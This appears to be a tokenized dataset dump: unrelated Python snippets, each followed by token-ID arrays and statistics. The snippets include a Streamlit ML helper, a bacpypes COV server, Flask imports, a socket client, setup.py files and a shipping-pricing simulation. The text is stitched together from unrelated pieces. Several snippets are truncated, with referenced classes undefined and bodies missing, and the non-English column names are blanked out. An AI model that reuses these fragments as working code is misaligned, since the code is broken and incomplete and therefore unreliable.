import streamlit as st import math from scipy.stats import * import pandas as pd import numpy as np from plotnine import *
[ 11748, 4269, 18250, 355, 336, 198, 11748, 10688, 198, 6738, 629, 541, 88, 13, 34242, 1330, 1635, 198, 11748, 19798, 292, 355, 279, 67, 198, 11748, 299, 32152, 355, 45941, 198, 6738, 7110, 30888, 1330, 1635, 198 ]
3.324324
37
import logging import unittest from config_test import build_client_from_configuration _logger = logging.getLogger(__name__)
[ 11748, 18931, 198, 11748, 555, 715, 395, 198, 198, 6738, 4566, 62, 9288, 1330, 1382, 62, 16366, 62, 6738, 62, 11250, 3924, 198, 198, 62, 6404, 1362, 796, 18931, 13, 1136, 11187, 1362, 7, 834, 3672, 834, 8, 628 ]
3.282051
39
"""Runway providers."""
[ 37811, 10987, 1014, 9549, 526, 15931, 198 ]
3.428571
7
#!/usr/bin/env python """ This sample application is a server that supports COV notification services. The console accepts commands that change the properties of an object that triggers the notifications. """ import time from threading import Thread from bacpypes.debugging import bacpypes_debugging, ModuleLogger from bacpypes.consolelogging import ConfigArgumentParser from bacpypes.consolecmd import ConsoleCmd from bacpypes.core import run, deferred, enable_sleeping from bacpypes.task import RecurringTask from bacpypes.app import BIPSimpleApplication from bacpypes.object import AnalogValueObject, BinaryValueObject from bacpypes.local.device import LocalDeviceObject from bacpypes.service.cov import ChangeOfValueServices # some debugging _debug = 0 _log = ModuleLogger(globals()) # test globals test_av = None test_bv = None test_application = None # # SubscribeCOVApplication # # # COVConsoleCmd # def main(): global test_av, test_bv, test_application # make a parser parser = ConfigArgumentParser(description=__doc__) parser.add_argument("--console", action="store_true", default=False, help="create a console", ) # analog value task and thread parser.add_argument("--avtask", type=float, help="analog value recurring task", ) parser.add_argument("--avthread", type=float, help="analog value thread", ) # analog value task and thread parser.add_argument("--bvtask", type=float, help="binary value recurring task", ) parser.add_argument("--bvthread", type=float, help="binary value thread", ) # provide a different spin value parser.add_argument("--spin", type=float, help="spin time", default=1.0, ) # parse the command line arguments args = parser.parse_args() if _debug: _log.debug("initialization") if _debug: _log.debug(" - args: %r", args) # make a device object this_device = LocalDeviceObject(ini=args.ini) if _debug: _log.debug(" - this_device: %r", this_device) # make a sample application test_application = SubscribeCOVApplication(this_device, args.ini.address) # make an analog value object test_av = AnalogValueObject( objectIdentifier=('analogValue', 1), objectName='av', presentValue=0.0, statusFlags=[0, 0, 0, 0], covIncrement=1.0, ) _log.debug(" - test_av: %r", test_av) # add it to the device test_application.add_object(test_av) _log.debug(" - object list: %r", this_device.objectList) # make a binary value object test_bv = BinaryValueObject( objectIdentifier=('binaryValue', 1), objectName='bv', presentValue='inactive', statusFlags=[0, 0, 0, 0], ) _log.debug(" - test_bv: %r", test_bv) # add it to the device test_application.add_object(test_bv) # make a console if args.console: test_console = COVConsoleCmd() _log.debug(" - test_console: %r", test_console) # enable sleeping will help with threads enable_sleeping() # analog value task if args.avtask: test_av_task = TestAnalogValueTask(args.avtask) test_av_task.install_task() # analog value thread if args.avthread: test_av_thread = TestAnalogValueThread(args.avthread) deferred(test_av_thread.start) # binary value task if args.bvtask: test_bv_task = TestBinaryValueTask(args.bvtask) test_bv_task.install_task() # binary value thread if args.bvthread: test_bv_thread = TestBinaryValueThread(args.bvthread) deferred(test_bv_thread.start) _log.debug("running") run(args.spin) _log.debug("fini") if __name__ == "__main__": main()
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 198, 37811, 198, 1212, 6291, 3586, 318, 257, 4382, 326, 6971, 7375, 53, 14483, 2594, 13, 198, 464, 8624, 18178, 9729, 326, 1487, 262, 6608, 286, 281, 2134, 326, 198, 2213, 328, 5355, ...
2.547493
1,516
import os import platform import subprocess from django.http import HttpResponse from django.conf import settings
[ 11748, 28686, 198, 11748, 3859, 198, 11748, 850, 14681, 198, 198, 6738, 42625, 14208, 13, 4023, 1330, 367, 29281, 31077, 198, 6738, 42625, 14208, 13, 10414, 1330, 6460, 198 ]
3.965517
29
import random import numpy as np import pandas as pd import streamlit as st from sklearn.naive_bayes import GaussianNB from sklearn.model_selection import train_test_split from yellowbrick.classifier import classification_report from yellowbrick.target import FeatureCorrelation from yellowbrick.target import ClassBalance from streamlit_yellowbrick import st_yellowbrick from typing import Any, List, Tuple import plotly.express as px def data_prep(df: pd.DataFrame) -> Tuple[List, List, List, List]: """ Purpose: Prep data for modeling Args: df - Pandas dataframe Returns: test_features - test set features train_features - train set feautres test_target - test set target train_target - train set target """ # Specify the target classes target_string = st.selectbox("Select Target Column", df.columns) target = np.array(df[target_string]) # Select Features you want feature_cols = st.multiselect("Select Modeling Features", df.columns) # Get all features features = df[feature_cols] featurestmp = np.array(features) feats = [] # find all bad rows for index, featarr in enumerate(featurestmp): try: featarr = featarr.astype(float) feats.append(featarr) except Exception as error: st.error(error) st.error(featarr) st.stop() featuresarr = np.array(feats) # Split Data randInt = random.randint(1, 200) ( test_features, train_features, test_target, train_target, ) = train_test_split(featuresarr, target, test_size=0.75, random_state=randInt) return ( test_features, train_features, test_target, train_target, ) def show_classification_report( df: pd.DataFrame, ) -> None: """ Purpose: Renders a classification_report Args: df - Pandas dataframe Returns: N/A """ # Prep data for model training ( test_features, train_features, test_target, train_target, ) = data_prep(df) if st.button("Train Model"): st.header("Classification Report") st.markdown( "The classification report visualizer displays the precision, recall, F1, and support scores for the model. In order to support easier interpretation and problem detection, the report integrates numerical scores with a color-coded heatmap. All heatmaps are in the range (0.0, 1.0) to facilitate easy comparison of classification models across different classification reports." ) # Instantiate the visualizer visualizer = classification_report( GaussianNB(), train_features, train_target, test_features, test_target, support=True, ) # Get the viz fig = visualizer.fig ax = visualizer.show() fig.axes.append(ax) # show the viz st.write(fig) # TODO download model, Download report # TODO live predictions def feature_correlation(df: pd.DataFrame) -> None: """ Purpose: Renders a feature correlation graph Args: df - Pandas dataframe Returns: N/A """ target_string = st.selectbox("Select Target Column", df.columns, key="selectbox-feature-correlation") residual_cols = [col for col in df.columns if col != target_string and df[col].dtype != "object"] feature_cols = st.multiselect("Select Modeling Features", residual_cols, key="multiselect-feature-correlation", default=residual_cols[:5]) if str(df[target_string].dtype) == "object": method = 'mutual_info-classification' else: type_problem = st.selectbox("Select the type of problem", ['classification', 'regression']) if type_problem == 'classification': method = st.selectbox("Select the correlation method", ['mutual_info-classification', 'pearson']) else: method = st.selectbox("Select the correlation method", ['mutual_info-regression', 'pearson']) try: viz = FeatureCorrelation(method=method, feature_names=feature_cols, sort=True) viz.fit(df[feature_cols], df[target_string]) fig = px.bar(x=viz.scores_, y=viz.features_, title="Feature Correlation") st.plotly_chart(fig) except : st.warning("Verify the type of problem that you select") def class_balance(df: pd.DataFrame) -> None: """ Purpose: Renders a class balance graph Args: df - Pandas dataframe Returns: N/A """ classes = st.selectbox("Select Class Column", df.columns, index = len(df.columns) - 1) visualizer = ClassBalance(labels = df[classes].unique()) visualizer.fit(df[classes]) st_yellowbrick(visualizer)
[ 11748, 4738, 198, 11748, 299, 32152, 355, 45941, 198, 11748, 19798, 292, 355, 279, 67, 198, 11748, 4269, 18250, 355, 336, 198, 6738, 1341, 35720, 13, 2616, 425, 62, 24406, 274, 1330, 12822, 31562, 32819, 198, 6738, 1341, 35720, 13, 1984...
2.310468
2,245
from flask import request import random import re from flask import current_app, jsonify from flask import g from flask import make_response from flask import redirect from flask import render_template from flask import request from flask import session from flask import url_for import time from info import constants, db from info import redis_store from info.lib.yuntongxun.sms import CCP from info.utils.captcha.captcha import captcha from info.utils.image_storage import storage from info.utils.response_code import RET from info.modules.passport import passport_blu from info.models import User, Category, News from info.modules.profile import profile_blu from info.utils.common import user_login_data from datetime import datetime, timedelta from . import admin_blu
[ 6738, 42903, 1330, 2581, 198, 11748, 4738, 198, 11748, 302, 198, 6738, 42903, 1330, 1459, 62, 1324, 11, 33918, 1958, 198, 6738, 42903, 1330, 308, 198, 6738, 42903, 1330, 787, 62, 26209, 198, 6738, 42903, 1330, 18941, 198, 6738, 42903, 1...
3.834146
205
#Answer Generation import csv import os import numpy as np from keras.models import * from keras.models import Model from keras.preprocessing import text train_ans, anslist = [], [] if __name__ == "__main__": main()
[ 2, 33706, 16588, 198, 11748, 269, 21370, 198, 11748, 28686, 198, 11748, 299, 32152, 355, 45941, 198, 6738, 41927, 292, 13, 27530, 1330, 1635, 198, 6738, 41927, 292, 13, 27530, 1330, 9104, 198, 6738, 41927, 292, 13, 3866, 36948, 1330, 24...
3.126761
71
# -*- coding: UTF-8 -*- from socket import * if __name__=='__main__': client() # buffer='POST /post HTTP/1.1\r\n' # buffer+='Content-Type:application/json\r\n' # buffer+='Body:{\\"StuId\\":\\"410785016 Chao,He-Teng\\"}\r\n' # buffer+='Address : ' + address + '\r\n' # buffer+='\r\n' # print(buffer) # message = ":)"
[ 2, 532, 9, 12, 19617, 25, 41002, 12, 23, 532, 9, 12, 198, 6738, 17802, 1330, 1635, 198, 198, 361, 11593, 3672, 834, 855, 6, 834, 12417, 834, 10354, 198, 220, 220, 220, 5456, 3419, 628, 1303, 11876, 11639, 32782, 1220, 7353, 14626, ...
2.297872
141
"""Non-linear SPDE model on a periodic 1D spatial domain for laminar wave fronts. Based on the Kuramato--Sivashinsky PDE model [1, 2] which exhibits spatio-temporally chaotic dynamics. References: 1. Kuramoto and Tsuzuki. Persistent propagation of concentration waves in dissipative media far from thermal equilibrium. Progress in Theoretical Physcs, 55 (1976) pp. 356369. 2. Sivashinsky. Nonlinear analysis of hydrodynamic instability in laminar flames I. Derivation of basic equations. Acta Astronomica, 4 (1977) pp. 11771206. """ from typing import Union, Optional, Sequence, Callable import numpy as np from dapy.models.base import AbstractDiagonalGaussianModel from dapy.models.spatial import SpatiallyExtendedModelMixIn from dapy.integrators.etdrk4 import FourierETDRK4Integrator from dapy.models.transforms import ( OneDimensionalFourierTransformedDiagonalGaussianModelMixIn, fft, real_array_to_rfft_coeff, rfft_coeff_to_real_array, )
[ 37811, 15419, 12, 29127, 30628, 36, 2746, 319, 257, 27458, 352, 35, 21739, 7386, 329, 300, 5669, 283, 6769, 29324, 13, 198, 198, 15001, 319, 262, 18132, 321, 5549, 438, 50, 452, 1077, 19870, 350, 7206, 2746, 685, 16, 11, 362, 60, 54...
3.012048
332
"""Utiltiy functions for working with Myo Armband data.""" from setuptools import setup, find_packages setup(name='myo_helper', version='0.1', description='Utiltiy functions for working with Myo Armband data', author='Lif3line', author_email='adamhartwell2@gmail.com', license='MIT', packages=find_packages(), url='https://github.com/Lif3line/myo_helper', # use the URL to the github repo install_requires=[ 'scipy', 'sklearn', 'numpy' ], keywords='myo emg')
[ 37811, 18274, 2326, 7745, 5499, 329, 1762, 351, 2011, 78, 943, 2022, 392, 1366, 526, 15931, 198, 198, 6738, 900, 37623, 10141, 1330, 9058, 11, 1064, 62, 43789, 628, 198, 40406, 7, 3672, 11639, 1820, 78, 62, 2978, 525, 3256, 198, 220, ...
2.333333
237
# -*-encoding:utf-8-*- import os from karlooper.web.application import Application from karlooper.web.request import Request url_mapping = { "/users": UsersHandler, "/user-info": UserInfoHandler } settings = { "template": os.getcwd() + "/templates", "static": os.getcwd() + "/templates", "log_enable": False, "debug": True } if __name__ == '__main__': application = Application(url_mapping, settings=settings) application.listen(port=8080) application.run()
[ 2, 532, 9, 12, 12685, 7656, 25, 40477, 12, 23, 12, 9, 12, 198, 198, 11748, 28686, 198, 6738, 479, 283, 5439, 3575, 13, 12384, 13, 31438, 1330, 15678, 198, 6738, 479, 283, 5439, 3575, 13, 12384, 13, 25927, 1330, 19390, 628, 628, 19...
2.670213
188
import random import math
[ 11748, 4738, 198, 11748, 10688, 628, 628, 198 ]
3.75
8
from waiter.action import process_kill_request from waiter.util import guard_no_cluster, check_positive def kill(clusters, args, _, __): """Kills the service(s) using the given token name.""" guard_no_cluster(clusters) token_name_or_service_id = args.get('token-or-service-id') is_service_id = args.get('is-service-id', False) force_flag = args.get('force', False) timeout_secs = args['timeout'] success = process_kill_request(clusters, token_name_or_service_id, is_service_id, force_flag, timeout_secs) return 0 if success else 1 def register(add_parser): """Adds this sub-command's parser and returns the action function""" parser = add_parser('kill', help='kill services') parser.add_argument('token-or-service-id') parser.add_argument('--force', '-f', help='kill all services, never prompt', dest='force', action='store_true') parser.add_argument('--service-id', '-s', help='kill by service id instead of token', dest='is-service-id', action='store_true') parser.add_argument('--timeout', '-t', help='timeout (in seconds) for kill to complete', type=check_positive, default=30) return kill
[ 6738, 46612, 13, 2673, 1330, 1429, 62, 12728, 62, 25927, 198, 6738, 46612, 13, 22602, 1330, 4860, 62, 3919, 62, 565, 5819, 11, 2198, 62, 24561, 628, 198, 4299, 1494, 7, 565, 13654, 11, 26498, 11, 4808, 11, 11593, 2599, 198, 220, 220...
2.772414
435
"""The main module of the Analytics API Load Tests tool. Copyright (c) 2019 Red Hat Inc. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. """ import sys import os from time import time from fastlog import log from csv_reader import read_csv_as_dicts from setup import setup from cliargs import cli_parser from component_analysis import ComponentAnalysis from stack_analysis import StackAnalysis from test_runner import start_tests # current version of this tool VERSION_MAJOR = 1 VERSION_MINOR = 0 def check_api_endpoint(api): """Check that some API endpoint is callable.""" log.info("Checking: core API endpoint") with log.indent(): if not api.is_api_running(): log.error("Fatal: tested system is not available") sys.exit(1) else: log.success("ok") def check_auth_token(api): """Check the authorization token for the core API.""" log.info("Checking: authorization token for the core API") with log.indent(): if api.check_auth_token_validity(): log.success("ok") else: log.error("Fatal: wrong token(?)") sys.exit(1) def check_system(api): """Check if all system endpoints are available and that tokens are valid.""" # try to access system endpoints log.info("System check") with log.indent(): check_api_endpoint(api) check_auth_token(api) def show_version(): """Show A2T version.""" print("A2T version {major}.{minor}".format(major=VERSION_MAJOR, minor=VERSION_MINOR)) def main(): """Entry point to the Analytics API Load Tests.""" log.setLevel(log.INFO) cli_arguments = cli_parser.parse_args() if cli_arguments.version: show_version() sys.exit(0) else: cfg = setup(cli_arguments) coreapi_url = os.environ.get('F8A_SERVER_API_URL', None) component_analysis = ComponentAnalysis(coreapi_url, cfg["access_token"], cfg["user_key"], True) stack_analysis = StackAnalysis(coreapi_url, cfg["access_token"], cfg["user_key"], True) check_system(component_analysis) try: tests = read_csv_as_dicts(cfg["input_file"]) except Exception as e: log.error("Test description can not be read") log.error(e) sys.exit(0) t1 = time() tags = cfg["tags"] start_tests(cfg, tests, tags, component_analysis, stack_analysis) t2 = time() log.info("Start time: {}".format(t1)) log.info("End time: {}".format(t2)) log.info("Duration: {}".format(t2 - t1)) if __name__ == "__main__": # execute only if run as a script main()
[ 37811, 464, 1388, 8265, 286, 262, 30437, 7824, 8778, 30307, 2891, 13, 198, 198, 15269, 357, 66, 8, 13130, 2297, 10983, 3457, 13, 198, 198, 1212, 1430, 318, 1479, 3788, 25, 345, 460, 17678, 4163, 340, 290, 14, 273, 13096, 198, 270, 7...
2.548092
1,310
# See LICENSE.incore file for details import os,re import multiprocessing as mp import time import shutil from riscv_ctg.log import logger import riscv_ctg.utils as utils import riscv_ctg.constants as const from riscv_isac.cgf_normalize import expand_cgf from riscv_ctg.generator import Generator from math import * from riscv_ctg.__init__ import __version__
[ 2, 4091, 38559, 24290, 13, 1939, 382, 2393, 329, 3307, 198, 198, 11748, 28686, 11, 260, 198, 11748, 18540, 305, 919, 278, 355, 29034, 198, 198, 11748, 640, 198, 11748, 4423, 346, 198, 6738, 374, 2304, 85, 62, 310, 70, 13, 6404, 1330...
2.873016
126
from collections import namedtuple MainTimer = namedtuple('MainTimer', 'new_time_joined, end_period, new_weekday, days') print('---'*30) x = add_time('10:00 AM', '54:00', 'Monday') print(x) print('---'*30)
[ 6738, 17268, 1330, 3706, 83, 29291, 628, 198, 13383, 48801, 796, 3706, 83, 29291, 10786, 13383, 48801, 3256, 705, 3605, 62, 2435, 62, 46416, 11, 886, 62, 41007, 11, 649, 62, 10464, 820, 11, 1528, 11537, 628, 198, 198, 4798, 10786, 632...
2.658228
79
from .analyze_logs import AnalyzeLogs from .search_interface import SearchInterface from .detail_interface import DetailInterface from .user_interface import UserInterface from .visualize_log_detail import VisualizeLogDetail
[ 6738, 764, 38200, 2736, 62, 6404, 82, 1330, 16213, 2736, 11187, 82, 198, 6738, 764, 12947, 62, 39994, 1330, 11140, 39317, 198, 6738, 764, 49170, 62, 39994, 1330, 42585, 39317, 198, 6738, 764, 7220, 62, 39994, 1330, 11787, 39317, 198, 67...
4.090909
55
import matplotlib.pyplot as plt import numpy as np import sys sys.path.append('../../../software/models/') import dftModel as DFT import math k0 = 8.5 N = 64 w = np.ones(N) x = np.cos(2*np.pi*k0/N*np.arange(-N/2,N/2)) mX, pX = DFT.dftAnal(x, w, N) y = DFT.dftSynth(mX, pX, N) plt.figure(1, figsize=(9.5, 5)) plt.subplot(311) plt.title('positive freq. magnitude spectrum in dB: mX') plt.plot(np.arange(mX.size), mX, 'r', lw=1.5) plt.axis([0,mX.size, min(mX), max(mX)+1]) plt.subplot(312) plt.title('positive freq. phase spectrum: pX') plt.plot(np.arange(pX.size), pX, 'c', lw=1.5) plt.axis([0, pX.size,-np.pi,np.pi]) plt.subplot(313) plt.title('inverse spectrum: IDFT(X)') plt.plot(np.arange(-N/2, N/2), y,'b', lw=1.5) plt.axis([-N/2,N/2-1,min(y), max(y)]) plt.tight_layout() plt.savefig('idft.png') plt.show()
[ 11748, 2603, 29487, 8019, 13, 9078, 29487, 355, 458, 83, 198, 11748, 299, 32152, 355, 45941, 198, 11748, 25064, 198, 198, 17597, 13, 6978, 13, 33295, 10786, 40720, 40720, 40720, 43776, 14, 27530, 14, 11537, 198, 11748, 288, 701, 17633, ...
1.929078
423
# setup.py as described in: # https://stackoverflow.com/questions/27494758/how-do-i-make-a-python-script-executable # to install on your system, run: # > pip install -e . from setuptools import setup, find_packages setup( name='typobs', version='0.0.3', entry_points={ 'console_scripts': [ 'to_obsidian=to_obsidian:run', 'to_typora=to_typora:run', ] }, packages=find_packages(), # metadata to display on PyPI author="Jerzy Dziewierz", author_email="jurek_pypi@dziewierz.pl", description="Convert between Typora and Obsidian link styles", keywords="Typora Obsidian Markdown link converter", url="https://github.com/jerzydziewierz/typobs", # project home page, if any project_urls={ "Bug Tracker": "https://github.com/jerzydziewierz/typobs", "Documentation": "https://github.com/jerzydziewierz/typobs", "Source Code": "https://github.com/jerzydziewierz/typobs", }, classifiers=[ "Programming Language :: Python", "Topic :: Documentation", "Topic :: Software Development :: Documentation", "Topic :: Office/Business", "Topic :: Text Processing :: Filters", "Topic :: Text Processing :: Markup", "Development Status :: 5 - Production/Stable", "Environment :: Console", "License :: OSI Approved :: Apache Software License", ] )
[ 2, 9058, 13, 9078, 355, 3417, 287, 25, 198, 2, 3740, 1378, 25558, 2502, 11125, 13, 785, 14, 6138, 507, 14, 1983, 2920, 32576, 23, 14, 4919, 12, 4598, 12, 72, 12, 15883, 12, 64, 12, 29412, 12, 12048, 12, 18558, 18187, 198, 2, 284...
2.501761
568
""" decoded AUTH_HEADER (newlines added for readability): { "identity": { "account_number": "1234", "internal": { "org_id": "5678" }, "type": "User", "user": { "email": "test@example.com", "first_name": "Firstname", "is_active": true, "is_internal": true, "is_org_admin": false, "last_name": "Lastname", "locale": "en_US", "username": "test_username" } } "entitlements": { "smart_management": { "is_entitled": true } } } """ AUTH_HEADER = { "X-RH-IDENTITY": "eyJpZGVudGl0eSI6eyJhY2NvdW50X251bWJlciI6" "IjEyMzQiLCJpbnRlcm5hbCI6eyJvcmdfaWQiOiI1" "Njc4In0sInR5cGUiOiJVc2VyIiwidXNlciI6eyJl" "bWFpbCI6InRlc3RAZXhhbXBsZS5jb20iLCJmaXJz" "dF9uYW1lIjoiRmlyc3RuYW1lIiwiaXNfYWN0aXZl" "Ijp0cnVlLCJpc19pbnRlcm5hbCI6dHJ1ZSwiaXNf" "b3JnX2FkbWluIjpmYWxzZSwibGFzdF9uYW1lIjoi" "TGFzdG5hbWUiLCJsb2NhbGUiOiJlbl9VUyIsInVz" "ZXJuYW1lIjoidGVzdF91c2VybmFtZSJ9fSwiZW50" "aXRsZW1lbnRzIjogeyJzbWFydF9tYW5hZ2VtZW50" "IjogeyJpc19lbnRpdGxlZCI6IHRydWUgfX19Cg==" } AUTH_HEADER_NO_ENTITLEMENTS = { "X-RH-IDENTITY": "eyJpZGVudGl0eSI6eyJhY2NvdW50X251bWJlciI6Ij" "EyMzQiLCJ0eXBlIjoiVXNlciIsInVzZXIiOnsidXNl" "cm5hbWUiOiJ0ZXN0X3VzZXJuYW1lIiwiZW1haWwiOi" "J0ZXN0QGV4YW1wbGUuY29tIiwiZmlyc3RfbmFtZSI6" "IkZpcnN0bmFtZSIsImxhc3RfbmFtZSI6Ikxhc3RuYW" "1lIiwiaXNfYWN0aXZlIjp0cnVlLCJpc19vcmdfYWRt" "aW4iOmZhbHNlLCJpc19pbnRlcm5hbCI6dHJ1ZSwibG" "9jYWxlIjoiZW5fVVMifSwiaW50ZXJuYWwiOnsib3Jn" "X2lkIjoiNTY3OCJ9fX0KCg==" } AUTH_HEADER_SMART_MGMT_FALSE = { "X-RH-IDENTITY": "eyJpZGVudGl0eSI6eyJhY2NvdW50X251bWJlciI6" "IjEyMzQiLCJpbnRlcm5hbCI6eyJvcmdfaWQiOiAi" "NTY3OCJ9LCJ0eXBlIjogIlVzZXIiLCJ1c2VyIjp7" "ImVtYWlsIjoidGVzdEBleGFtcGxlLmNvbSIsImZp" "cnN0X25hbWUiOiJGaXJzdG5hbWUiLCJpc19hY3Rp" "dmUiOnRydWUsImlzX2ludGVybmFsIjp0cnVlLCJp" "c19vcmdfYWRtaW4iOmZhbHNlLCJsYXN0X25hbWUi" "OiJMYXN0bmFtZSIsImxvY2FsZSI6ImVuX1VTIiwi" "dXNlcm5hbWUiOiJ0ZXN0X3VzZXJuYW1lIn19LCJl" "bnRpdGxlbWVudHMiOnsic21hcnRfbWFuYWdlbWVu" "dCI6eyJpc19lbnRpdGxlZCI6IGZhbHNlfX19Cg==" } # this can't happen in real life, adding test anyway AUTH_HEADER_NO_ACCT_BUT_HAS_ENTS = { "X-RH-IDENTITY": "eyJpZGVudGl0eSI6eyJpbnRlcm5hbCI6eyJvcmdf" "aWQiOiAiNTY3OCJ9LCJ0eXBlIjogIlVzZXIiLCJ1" "c2VyIjp7ImVtYWlsIjoidGVzdEBleGFtcGxlLmNv" "bSIsImZpcnN0X25hbWUiOiJGaXJzdG5hbWUiLCJp" "c19hY3RpdmUiOnRydWUsImlzX2ludGVybmFsIjp0" "cnVlLCJpc19vcmdfYWRtaW4iOmZhbHNlLCJsYXN0" "X25hbWUiOiJMYXN0bmFtZSIsImxvY2FsZSI6ImVu" "X1VTIiwidXNlcm5hbWUiOiJ0ZXN0X3VzZXJuYW1l" "In19LCJlbnRpdGxlbWVudHMiOnsic21hcnRfbWFu" "YWdlbWVudCI6eyJpc19lbnRpdGxlZCI6IHRydWV9" "fX0K" } """ decoded AUTH_HEADER_NO_ACCT (newlines added for readablity): { "identity": { "internal": { "org_id": "9999" }, "type": "User", "user": { "email": "nonumber@example.com", "first_name": "No", "is_active": true, "is_internal": true, "is_org_admin": false, "last_name": "Number", "locale": "en_US", "username": "nonumber" } } } """ AUTH_HEADER_NO_ACCT = { "X-RH-IDENTITY": "eyJpZGVudGl0eSI6eyJ0eXBlIjoiVXNlciIsInVzZXIiO" "nsidXNlcm5hbWUiOiJub251bWJlciIsImVtYWlsIjoibm" "9udW1iZXJAZXhhbXBsZS5jb20iLCJmaXJzdF9uYW1lIjo" "iTm8iLCJsYXN0X25hbWUiOiJOdW1iZXIiLCJpc19hY3Rp" "dmUiOnRydWUsImlzX29yZ19hZG1pbiI6ZmFsc2UsImlzX" "2ludGVybmFsIjp0cnVlLCJsb2NhbGUiOiJlbl9VUyJ9LC" "JpbnRlcm5hbCI6eyJvcmdfaWQiOiI5OTk5In19fQo=" } BASELINE_ONE_LOAD = { "baseline_facts": [ {"name": "arch", "value": "x86_64"}, {"name": "phony.arch.fact", "value": "some value"}, ], "display_name": "arch baseline", } BASELINE_TWO_LOAD = { "baseline_facts": [ {"name": "memory", "value": "64GB"}, {"name": "cpu_sockets", "value": "16"}, ], "display_name": "cpu + mem baseline", } BASELINE_THREE_LOAD = { "baseline_facts": [ {"name": "nested", "values": [{"name": "cpu_sockets", "value": "16"}]} ], "display_name": "cpu + mem baseline", } BASELINE_PARTIAL_ONE = {"baseline_facts": [{"name": "hello", "value": "world"}]} BASELINE_PARTIAL_TWO = { "display_name": "ABCDE", "baseline_facts": [ { "name": "hello", "values": [ {"name": "nested_one", "value": "one"}, {"name": "nested_two", "value": "two"}, ], } ], } BASELINE_PARTIAL_CONFLICT = {"display_name": "arch baseline"} CREATE_FROM_INVENTORY = { "display_name": "created_from_inventory", "inventory_uuid": "df925152-c45d-11e9-a1f0-c85b761454fa", } SYSTEM_WITH_PROFILE = { "account": "9876543", "bios_uuid": "e380fd4a-28ae-11e9-974c-c85b761454fb", "created": "2018-01-31T13:00:00.100010Z", "display_name": None, "fqdn": None, "id": "bbbbbbbb-28ae-11e9-afd9-c85b761454fa", "insights_id": "00000000-28af-11e9-9ab0-c85b761454fa", "ip_addresses": ["10.0.0.3", "2620:52:0:2598:5054:ff:fecd:ae15"], "mac_addresses": ["52:54:00:cd:ae:00", "00:00:00:00:00:00"], "rhel_machine_id": None, "satellite_id": None, "subscription_manager_id": "RHN Classic and Red Hat Subscription Management", "system_profile": { "salutation": "hi", "system_profile_exists": False, "installed_packages": [ "openssl-1.1.1c-2.fc30.x86_64", "python2-libs-2.7.16-2.fc30.x86_64", ], "id": "bbbbbbbb-28ae-11e9-afd9-c85b761454fa", }, "tags": [], "updated": "2018-01-31T14:00:00.500000Z", }
[ 37811, 198, 12501, 9043, 37195, 62, 37682, 1137, 357, 3605, 6615, 2087, 329, 1100, 1799, 2599, 198, 90, 198, 220, 220, 220, 366, 738, 414, 1298, 1391, 198, 220, 220, 220, 220, 220, 220, 220, 366, 23317, 62, 17618, 1298, 366, 1065, 2...
1.592225
3,627
#####Time Flow Simulation###### import numpy as np import pandas as pd import matplotlib.pyplot as plt from datetime import timedelta import datetime import csv data=pd.read_excel('CF66-all.xlsx') data.sort_values(by=['WBL_AUD_DT'],ascending=True,inplace=True) or_data=pd.read_excel('CF66-ordinary.xlsx') rule=pd.read_excel('6. Existing pricing strategy.xlsx') or_name=or_data['WBL_NUM'].unique() data['ordinary']=0 for i in range(len(data)): if data.iloc[i,2] in or_name: data.iloc[i,9]=1 data['volume']=data['CNTR_TYPE'] for i in range(len(data)): data.iloc[i,10]=int(data.iloc[i,10][0:2]) raw_data=data.groupby('SVVD') data_to_list=list(raw_data) raw_list=[] for i in data_to_list: raw_list.append(i[1]) total_volume=raw_data['volume'].sum()*1.2 thisrule=rule.groupby(['','']).get_group(('','')) group_rule=thisrule.groupby(['','']) rule_to_list=list(group_rule) day_list=[] rule_list=[] for i in rule_to_list: day_list.append(i[0]) rule_list.append(i[1]) m=datetime.timedelta(days=14) newlist=[] for i in raw_list: i['WBL_AUD_DT']=pd.to_datetime(i['WBL_AUD_DT']) m=datetime.timedelta(days=14) j=i[i['WBL_AUD_DT']>=i['WBL_AUD_DT'].max()-m] newlist.append(j) del(raw_list) for i in newlist: i['acc_volume']=i['volume'].cumsum() i['total_volume']=i['volume'].sum()*1.2 m=datetime.timedelta(days=14) i['day']=(i['WBL_AUD_DT']-i['WBL_AUD_DT'].max()+m).dt.days i['acc_rate']=i['acc_volume']/i['total_volume']*100 i['new_AMT']=i['AMT'] for k in range(len(newlist)): acc_20gp=0 acc_40gp=0 acc_40hq=0 print('k='+str(k)) for i in range(len(day_list)): print('i='+str(i)) first_day=day_list[i][0] last_day=day_list[i][1] flag=[0]*len(rule_list[i]) for j in range(len(newlist[k])): if newlist[k].iloc[j]['day']>=first_day and newlist[k].iloc[j]['day']<last_day and newlist[k].iloc[j]['ordinary']==1: for z in range(len(rule_list[i])): print('z='+str(z)) if newlist[k].iloc[j]['acc_rate']>rule_list[i].iloc[z]['']and rule_list[i].iloc[z]['/']=='': if flag[z]==0: flag[z]=1 acc_20gp+=rule_list[i].iloc[z]['20GP'] acc_40gp+=rule_list[i].iloc[z]['40GP'] acc_40hq+=rule_list[i].iloc[z]['40HQ'] if newlist[k].iloc[j]['acc_rate']<rule_list[i].iloc[z]['']and rule_list[i].iloc[z]['/']=='': if flag[z]==0: flag[z]=1 acc_20gp-=rule_list[i].iloc[z]['20GP'] acc_40gp-=rule_list[i].iloc[z]['40GP'] acc_40hq-=rule_list[i].iloc[z]['40HQ'] print(flag) print(acc_20gp) print(acc_40gp) print(acc_40hq) if newlist[k].iloc[j]['CNTR_TYPE']=='20GP': newlist[k].iloc[j,15]+=acc_20gp if newlist[k].iloc[j]['CNTR_TYPE']=='40GP': newlist[k].iloc[j,15]+=acc_40gp if newlist[k].iloc[j]['CNTR_TYPE']=='40HQ': newlist[k].iloc[j,15]+=acc_40hq for i in newlist: print('revenue:'+str(i['AMT'].sum())) print('newrevenue:'+str(i['new_AMT'].sum())) newlist[0].to_csv('voyage1.csv') newlist[1].to_csv('voyage2.csv') newlist[2].to_csv('voyage3.csv')
